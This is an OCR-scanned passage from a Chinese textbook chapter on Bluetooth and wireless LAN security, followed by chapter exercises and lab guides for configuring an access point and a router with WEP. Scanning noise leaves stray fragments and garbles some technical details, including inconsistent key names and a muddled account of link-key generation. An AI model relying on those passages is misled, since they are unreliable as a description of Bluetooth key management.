(OBEX)、 控制 命令 (AT-Command)、 电子 商务 标准 协议 (vCard 和 vCalender) 和 PPP, IP, TCP， 
UDP 等 相关 的 Internet 协议 以 及 WAP 协议 。 其 中 ， 串 口 通信 协议 是 ETSI TS07.10 标准 的 
子 集 ， 并 且 加 入 了 蓝牙 特有 的 部 分 ， 电 话 控制 协议 使 用 了 一 个 以 比特 为 基础 的 协议 ， 定 义 
了 在 蓝牙 设备 之 间 建 立 语音 和 数据 呼叫 的 控制 信 令 , 对 象 交 换 协议 提供 了 与 IDA 协议 系列 
相同 的 特性 ， 并 且 使 各 种 应 用 可 以 在 IDA 协议 栈 和 蓝牙 协议 栈 上 使 用 。 

两 个 蓝牙 设备 必须 具有 相同 的 协议 组 成 才能 够 相互 通信 。 例 如 要 在 蓝牙 实现 WAP 应 
用 ， 则 双方 都 必须 经 过 基带 协议 一 一 L2CAP--RFCOMM--PPP---IP--UDP--WAP 的 路 径 来 
实现 。 


9.5.2 ”蓝牙 系统 安全 性 要 求 


由 于 蓝牙 系统 简单 可 靠 ， 从 而 产生 了 各 种 不 同 的 应 用 ， 例 如 电脑 、 鼠 标 、 打 印 机 、 接 
入 单 击 、 移 动 电话 和 话 简 等 都 可 以 使 用 蓝牙 协议 无 线 地 连接 在 一 起 ， 进 行 语音 和 数据 的 交 
换 。 同 时 ， 还 可 以 通过 无 线 或 有 线 的 接 入 点 (如 PSTN、ISDN、LAN、XDSL) 与 外 界 相连 。 不 
同 应 用 对 各 自 的 系统 必然 提出 不 同 的 要 求 , 并 且 不 是 所 有 的 系统 都 对 安全 性 有 很 高 的 要 求 。 

先 介 绍 几 个 概念 : 

(1) 蓝牙 设备 地 址 (BD_ADDR): 是 一 个 对 每 个 蓝牙 单元 唯一 的 48 位 IEEE 地 址 。 

(2) 个 人 确认 码 (PIN: Personal Identification Number): 是 由 蓝牙 单元 提供 的 1-16 位 ( 八 
进 制 ) 数 字 ， 可 以 固定 或 者 由 用 户 选择 。 一 般 来 讲 ， 这 个 PIN 码 是 随 单元 一 起 提供 的 一 个 固 
定数 字 。 但 当 该 单元 有 人 机 接口 时 ， 用 户 可 以 任意 选择 PIN 的 值 ， 从 而 进入 通信 单元 。 蓝 
牙 基 带 标准 中 要 求 PIN 的 值 是 可 以 改变 的 。 

(3) 鉴 权 字 : 是 长 度 为 128 位 的 数字 ， 用 于 系统 的 鉴 权 。 

(4) 加 密 字 : 长 度 8 一 128 位 ， 可 以 改变 。 这 是 因为 不 同 的 国家 有 许多 不 同 的 对 加 密 算 
法 的 要 求 ， 同 时 也 是 各 种 不 同 应 用 的 需要 ， 还 有 利于 算法 和 加 密 硬 件 系统 的 升级 。 

区 分 鉴 权 字 和 加 密 字 的 目的 是 在 不 降低 鉴 权 过 程 作用 的 前 提 下 使 用 更 短 的 加 密 字 。 

虽然 蓝牙 系统 的 跳 频 机 制 对 于 来 自 系 统 内 部 其 他 设备 的 偶然 传输 干扰 起 到 了 一 定 的 保 
护 作 用 ， 但 是 很 显然 仅 有 这 种 保护 是 不 够 的 。 它 不 能 防止 有 人 在 两 个 传输 单元 之 间 对 数据 
的 窃听 和 偷 取 ,尤其 在 无 线 传输 数据 时 , 窃取 数据 者 可 以 轻松 地 屏蔽 自己 而 不 让 用 户 发 现 ， 
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因此 蓝牙 系统 需要 加 入 相应 的 安全 机 制 。 在 一 般 的 系统 中 ， 通 常 对 所 传输 的 数据 包 进行 加 
密 , 但 仅 有 这 种 做 法 是 不 够 的 。 更 重要 的 是 在 通信 连接 建立 以 前 ,确保 通信 单元 的 安全 性 。 
例如 用 户 想 同时 跟 儿 个 用 户 通信 ， 就 需要 对 这 些 用 户 进行 确认 。 因 此 ， 在 蓝牙 系统 中 运用 
了 鉴 权 和 加 密 技术 。 


9.5.3 ”蓝牙 安全 机 制 


1. 字 管 理 机 制 


蓝牙 链 字 是 长 度 为 128 位 的 随机 数 ， 它 是 蓝牙 系统 鉴 权 和 加 密 的 基础 。 为 了 支持 不 同 
阶段 、 模 式 的 要 求 ， 蓝 牙 系 统 在 链 路 层 上 用 了 4 种 不 同 的 字 来 保证 系统 的 安全 性 。 包 括 单 
元 字 KA 组 合 字 是 KAB， 临 时 字 Kmaster 及 初始 化 字 Kinit。 
单元 字 KA 与 组 合 字 KAB 仅 产 生 方式 不 同 ， 执 行 的 功能 是 完全 相同 的 。 也 就 是 说 ， 
KAB 是 由 两 个 单元 A、B 共同 产生 的 ， 而 KA 仅 由 一 个 单元 A 产生 ， 因 此 KA 在 初始 化 阶 
段 产生 后 就 基本 不 变 了 。 系 统 的 内 存 比 较 小 时 通常 选择 KA， 而 系统 对 稳定 性 要 求 比较 高 
时 选择 KAB。 

临时 字 Kmaster 只 是 临时 取代 原始 字 。 例 如 ， 当 主机 想 与 多 个 子 机 通信 时 ， 主 机 将 用 
同一 个 加 密 字 ， 因 此 把 它 存 放 在 临时 字 中 ， 以 便于 使 用 。 

初始 化 字 Kinit 仅仅 在 初始 化 阶段 有 效 ， 也 是 单元 字 KA、KAB 产生 的 阶段 ， 它 不 仅仅 
是 初始 化 阶段 的 一 个 临时 字 ， 其 产生 需要 一 个 PIN。 

半 永 久 性 的 链接 字 在 特定 的 时 间 内 被 称 作 当前 链接 字 。 当前 链接 字 和 其 他 链接 字 一 样 ， 
用 于 鉴 权 和 加 密 过 程 。 此 外 ， 还 用 到 了 加 密 字 KC， 加 密 字 被 LM 的 命令 激活 后 将 自动 被 
改变 。 

另外 ， 鉴 权 字 和 加 密 字 在 不 同 的 阶段 执行 不 同 的 功能 。 例 如 : 在 两 个 单元 没有 建立 连 
接 的 阶段 和 已 经 建立 连接 的 阶段 有 很 大 的 不 同 ， 前 者 必须 首先 产生 加 密 字 ， 而 后 者 可 以 继 
续 使 用 上 次 通信 的 加 密 字 ， 相 应 地 不 同 的 阶段 对 字 的 管理 是 不 一 样 的 。 此 外 当主 机 想 广 播 
消息 ， 而 不 是 一 个 一 个 地 传送 消息 时 ， 需 要 特殊 的 字 管 理 方法 。 正 是 蓝牙 系统 有 力 的 字 管 
理 机 制 ， 才 使 得 系统 具有 很 好 的 安全 性 ， 而 且 支 持 不 同 的 应 用 模式 。 

2. 链接 字 的 产生 

初始 化 字 Kunit 的 值 以 申请 者 的 蓝牙 设备 地 址 、 一 个 PIN 码 、PIN 码 的 长 度 和 一 个 随 
机 数 作为 参数 ， 通 过 E22 算法 产生 。 而 申请 者 相对 校 验 者 而 言 是 需要 通过 验证 的 一 方 。 因 
此 ， 申 请 者 需要 正确 的 PIN 码 和 PIN 码 的 长 度 。 一 般 来 讲 ， 由 HCI 决定 谁 是 申请 者 ， 谁 是 
校 验 者 。 

当 PIN 的 长 度 少 于 16 个 八进制 数 时 , 可 以 通过 填充 蓝牙 设备 地 址 的 数据 使 其 增 大 , 因 
此 如 果 循 环 使 用 E22 可 以 使 链接 字 的 长 度 增长 为 128 位 。 

初始 化 链接 字 Kint 产生 后 ,该 单元 将 产生 一 个 半 永 久 字 KA 或 KAB。 如果 产生 的 是 一 
个 KAB, 则 该 单元 将 用 一 个 随机 数 LK_RAND 周期 性 地 加 密 蓝牙 设备 地 址 , 加密 后 的 结果 
为 LK_ KA， 而 各 自 产 生 的 LK_RAND 与 当前 的 链接 字 进 行 异 或 运算 后 ， 分 别 产生 新 值 
永 为 CA 和 CA, 然后 互相 交换 ， 从 而 得 到 了 对 方 的 LK_ RAND,， 并 以 对 方 的 LK RAND 和 
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蓝牙 设备 地 址 作为 参数 ， 用 E21 函数 产生 新 值 LK_KB 的 异 或 运算 得 到 组 合 字 KAB。 当 


KAB 产生 后 ， 首 先 单 向 鉴 权 一 次 ， 看 KKAB 变 为 当前 链接 字 ， 而 丢弃 原先 的 链接 字 K。E22 


的 工作 原理 与 E21 类 似 。 

3. 蓝牙 单元 鉴 权 

在 鉴 权 过 程 中 ，LM 决定 谁 是 校 验 者 ， 谁 是 申请 者 。 申 请 者 和 校 验 者 必须 同时 拥有 一 
个 共同 的 当前 链接 字 。 而 这 种 口令 应 答 方式 的 鉴 权 实际 上 是 申请 者 发 送 一 个 随机 数 RAND， 
随后 校 验 者 用 当前 密 钥 字 、 申 请 者 的 蓝牙 设备 地 址 和 RAND 作为 加 密 算法 的 参数 得 到 新 值 ， 
记 为 SRES"。 申 请 者 以 同样 的 参数 、 算 法 得 到 的 新 值 记 为 SRES. 然 后 ,申请 者 将 SRES 传送 
给 校 验 者 ,比较 SRES" 和 SRES 是 否 相等 。 如 果 相等 ， 则 鉴 权 通过 ， 和 否则 鉴 权 失败 。 在 间隔 
一 定时 间 后 系统 重新 鉴 权 ， 鉴 权 机 制 的 安全 性 是 相当 高 的 。 更 保险 的 做 法 是 采用 双向 鉴 权 ， 
即 一 次 鉴 权 成 功 后 ， 调 整 申请 者 和 校 验 者 的 角色 ， 再 次 鉴 权 。 鉴 权 成 功 以 后 ， 产 生 了 鉴 权 
编码 补偿 (ACO)， 以 用 于 加 密 字 的 产生 。 


4. 加 密 


为 了 保证 蓝牙 系统 的 安全 性 ， 必 须 采 用 加 密 技术 。 但 蓝牙 系统 对 数据 包头 和 控制 字段 
并 不 加 密 。 蓝 牙 系统 通过 一 个 同步 的 流 加 密 算法 对 每 一 个 负载 加 密 ， 由 LM 最 终 决 定 是 否 


加 密 。 


最 后 需要 注意 的 是 ， 不 仅 要 对 数据 包 加 密 ， 而 且 要 对 加 密 过 程 的 中 间 数 据 进行 加 密 ， 
例如 对 鉴 权 编码 补偿 进行 加 密 ， 这 样 才 能 防止 系统 被 攻击 和 数据 被 窃取 。 


9.5.4 ”如何 保护 蓝牙 


蓝牙 系统 提供 了 几 种 内 在 的 安全 机 制 ， 从 而 在 一 个 比较 广泛 的 范围 内 保证 了 蓝牙 系统 
的 安全 性 。 在 使 用 蓝牙 技术 的 过 程 中 ， 可 以 采用 以 下 几 个 措施 来 保证 其 安全 : 


1) 


不 使 用 就 不 启用 


如 果 希 望 保护 蓝牙 的 安全 ， 一 个 首要 的 原则 是 在 不 需要 使 用 蓝牙 的 时 候 将 其 关闭 。 对 


于 移动 电话 来 说 可 以 在 蓝牙 设置 页 面 中 将 蓝牙 关闭 ， 而 对 于 计算 机 上 的 蓝牙 适配器 ， 可 以 


通过 附带 的 工具 软件 或 操作 系统 本 身 的 蓝牙 软件 将 其 设置 为 不 可 连接 状态 。 


2) 


使 用 安全 设置 


在 蓝牙 规范 中 定义 了 三 种 安全 模式 : 没有 任何 保护 的 无 安全 模式 、 通 过 验证 码 保护 的 
服务 级 安全 、 可 以 应 用 加 密 的 设备 级 安全 。 在 适用 的 情况 下 尽 可 能 应 用 较 高 的 安全 模式 。 
对 便利 性 要 求 不 是 特别 高 的 环境 ， 不 要 将 蓝牙 设置 为 可 见 状态 ， 这 通常 不 会 对 验证 受到 信 
任 的 设备 造成 麻烦 。 


3) 


选择 强壮 的 PIN 码 


正常 的 蓝牙 设备 连接 会 使 用 PIN 码 进行 验证 ， 相 当 于 计算 机 的 访问 密码 。 通 常 在 设备 


出 厂 时 这 个 PIN 码 不 会 被 设置 或 者 被 设置 为 一 个 特定 的 四 位 数字 ， 这 样 的 PIN 码 设置 仍然 
很 容易 受到 攻击 。 目 前 , 每 一 百 部 蓝牙 手机 中 会 有 接近 百 分 之 十 到 百 分 之 二 十 使 用 1111 或 


1234 这 村 


# 简单 的 密码 ， 设 置 一 个 尽量 复杂 的 PIN 码 非常 的 重要 。 
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作 ”保持 对 安全 更 新 的 跟踪 

通常 存在 安全 漏洞 的 手机 都 可 以 通过 厂商 提供 的 更 新 进行 解决 ， 所 以 应 该 了 解 自 己 的 
设备 是 否 有 安全 漏洞 ， 并 及 时 从 厂商 处 获取 更 新 。 另 外 更 多 的 了 解 蓝牙 安全 方面 的 知识 ， 
并 应 用 一 些 免费 的 蓝牙 安全 工具 ， 也 可 以 有 效 地 减少 受 攻 击 的 可 能 。 

5) 足够 的 警惕 性 

恶意 攻击 并 不 总 是 隐 密 进行 的 ， 在 攻击 过 程 中 蓝牙 连接 的 状态 图 标 可 能 会 发 生变 化 ， 
设备 可 能 会 产生 某 些 声音 ， 还 可 能 会 出 现 可 疑 的 配对 请 求 。 蓝 牙 用 户 有 责任 对 安全 问题 保 
持 足够 的 警惕 ， 而 且 这 样 才能 阻止 各 种 社交 工程 行为 。 


小 结 


本 章 主要 介绍 了 无 线 局 域 网 安全 的 相关 知识 ， 通 过 本 章 学 习 ， 学 生 可 掌握 无 线 局 域 网 
相关 技术 、 无 线 局 域 网 面 对 的 安全 问题 和 解决 方案 ， 包 括 WEP 机 制 、VPN 技术 以 及 蓝牙 


本 章 习 题 
一 、 选 择 题 
1.。 为 实现 无 线 局 域 网 的 接 入 控制 ， 采 用 ( ”) 来 认证 用 户 。 
A.IEEE B. SSID C. WEP D. MAC 


2.、 攻击 者 恶意 占用 主机 或 网 络 几乎 所 有 的 资源 ， 使 得 合法 用 户 无 法 获得 这 些 资源 ， 
这 种 攻击 方式 称 为 ( 。 )。 


A. 渗透 B. 窃听 C. 拒绝 服务 攻击 D. 解密 
3. 无 线 网 络 接 入 点 称 为 ( )。 

A. 无 线 AP B. 无 线路 由 器 C. 无 线 上 网 卡 D. WEP 
4. NetStumbler 软件 的 功能 是 ( 入 

A. 加 密 无 线 信道 B. 提供 WEP 机 制 

C. 组 建 VPN D. 搜索 无 线 网 络 
5. 蓝牙 设备 的 标志 地 址 是 ( )。 

A.SSID B.IP 地 址 

C. 个 人 确认 码 D. IEEE 地 址 


6. ”下面 关于 TCP/IP 说 法 错误 的 是 ( 。 )。 
A. 它 是 一 种 双 层 程序 
B. TCP 协议 在 会 话 层 工作 
C. 了 PP 控制 信息 包 从 源头 到 目的 地 的 传输 路 径 
D.IP 协 议 属 于 网 络 层 
7. VPN 的 核心 功能 是 ( 让 
A. 安全 服务 B. 网 站 管理 C. 数据 分 析 D. 响应 请 求 
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8. 在 VPN 中 ， 如 何在 公用 数据 网 上 安全 地 传递 密 钥 而 不 被 窃取 ， 可 以 采用 (  )。 


A. 身份 认证 技术 B. 隧道 技术 
C. 密 钥 管理 技术 D. 加 密 技 术 
二 、 填 空 是 
1. 无 线 网 络 设备 主要 有 和 和 
2.， 无 线 上 网 卡 主要 有 和 两 种 。 
3. IEEE 802. 11b 标准 定义 了 和 两 种 方法 实现 无 线 局 域 网 的 接 入 
控制 和 加 密 。 
4.、 无 线 网 卡 有 和 三 种 标准 。 
5. 无 线 网 络 的 规格 标准 主要 有 s 四 种 。 


6. 虚拟 专用 网 络 主 要 采用 四 种 技术 来 保证 网 络 安全 ,它们 是 


综合 
、 缂 甩 


无 线 网 络 的 设备 有 哪些 ? 

WEP 机 制 的 作用 。 

什么 是 VPN? 如 何 对 VPN 进行 分 类 ? 
无 线 VPN 主要 特点 有 哪些 ? 


实 训 一 ”无 线 局 域 网 组 网 实验 指导 


wn 


1. 实验 目的 

了 解 无 线 网 络 的 概念 ， 学 习 无 线 组 网 的 方法 。 

掌握 无 线 网 络 接 入 点 WAP54G 的 安装 过 程 。 

掌握 安全 配置 无 线 网 络 接 入 点 WAP54G 的 方法 。 

掌握 Wireless-G USB 无 线 网 络 适 配器 的 安装 及 安全 配置 方法 。 

2. 实验 内 容 

(1) 无 线 网 络 接 入 点 WAP54G 的 安装 。 

(2) 安全 配置 无 线 网 络 接 入 点 WAP54G。 

(3) Wireless-G USB 无 线 网 络 适 配器 的 安装 及 安全 配置 。 

3. 实验 步 

1) ”实验 设备 的 选择 

本 实验 需要 的 设备 包括 : 

WAP54G 无 线 接 入 点 一 台 、Wireless-G USB 无 线 网 络 适配器 三 个 、STAR-1926F+ 交 
换 机 一 台 、 客 户 机 三 台 。 
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2) 
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WAP54G 无 线 接 入 点 的 连接 
给 接 入 点 找 一 个 最 佳 的 位 置 : 接 入 点 的 最 佳 位 置 一 般 位 于 无 线 网 络 的 中 心 ， 视 线 


可 以 到 达 所 有 移动 站 。 


(2) 


确定 天 线 的 方向 :天 线 的 位 置 应 当 能 够 覆盖 无 线 网 络 。 一 般 情况 天 线 越 高 ， 它 的 


性 能 就 越 好 。 天 线 的 位 置 对 接收 灵敏 度 的 影响 比较 大 。 


G3) 
(9 
3) 

(1D) 
2 
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(4) 
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局 域 网 端口 是 和 以 太 网 装置 相连 的 ， 如 : 集线器 、 开 关 或 路 由 器 。 

交流 电源 适配器 的 一 端 应 当 与 接 入 点 的 电源 端口 相连 ， 另 一 端 与 电源 相连 。 
WAP54G 无 线 接 入 点 的 配置 

启动 安装 光盘 的 安装 程序 ， 进 入 安装 向 导 。 

选择 一 个 无 线 接 入 点 ， 对 接 入 点 进行 下 列 配 置 。 

设置 配置 密码 。 

设置 接 入 点 名 称 、IP 地 址 和 子 网 掩 码 。 

设置 无 线 网 络 的 SSID， 选 择 与 你 的 网 络 设 定 值 相对 应 的 信道 (无 线 网 络 中 所 有 的 


点 都 必须 使 用 相同 的 信道 )。 


(0) 
0 


进行 保密 值 设 定 ， 并 保存 设置 结果 。 
Wireless-G USB 无 线 网 络 适配器 的 连接 


无 线 网 络 适配器 通过 它 的 USB 端口 与 计算 机 连接 起 来 ， 它 所 需要 的 电力 由 USB 连接 


器 提供 ， 


5) 
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故 不 需要 专门 的 电源 适配器 。 

Wireless-G USB 无 线 网 络 适 配器 的 配置 

启动 安装 光盘 的 安装 程序 ， 进 入 安装 向 导 。 

输入 无 线 网 络 的 SSID， 选 择 一 种 无 线 模 式 ， 再 根据 提示 操作 。 
将 无 线 网 络 适配器 与 计算 机 相连 ， 安 装 适 配器 驱动 软件 。 
使 用 WLAN 监视 器 检查 连接 信息 。 


实 训 二 “无 线路 由 器 安全 设置 实验 指导 


1. 实验 目的 

了 解 无 线路 由 器 的 功能 及 一 般 设 置 方法 。 
掌握 WEP 的 工作 原理 及 安全 机 制 。 

掌握 安全 配置 无 线路 由 器 方法 。 

掌握 一 般 无 线 网 络 适配器 安全 配置 。 

2. 实验 内 容 


(D 
(2) 
G3) 


无 线路 由 器 的 WEP 加 密 启 用 。 
无 线路 由 器 其 他 安全 设置 。 
无 线 适配器 的 安全 设置 。 


3. 实验 步 


(D 


实验 设备 的 选择 。 


由 务 9 得 ， 无 络 网 纤 安 全 


本 实验 需要 的 设备 包括 : TL-WR641G 无 线路 由 器 一 台 、TL-WN620G 无 线 网 络 适配器 
三 个 、STAR-1926F+ 交 换 机 一 台 、 客 户 机 三 台 。 

(2) 无 线路 由 器 的 WEP 加 密 启 用 。 

具体 步骤 见 9.3.2 节 内 容 无 线路 由 器 配置 。 

(3) 无 线 适 配器 的 安全 设置 。 

具体 步骤 见 9.3.2 节 内 容 无 线 适 配器 配置 。 


到 
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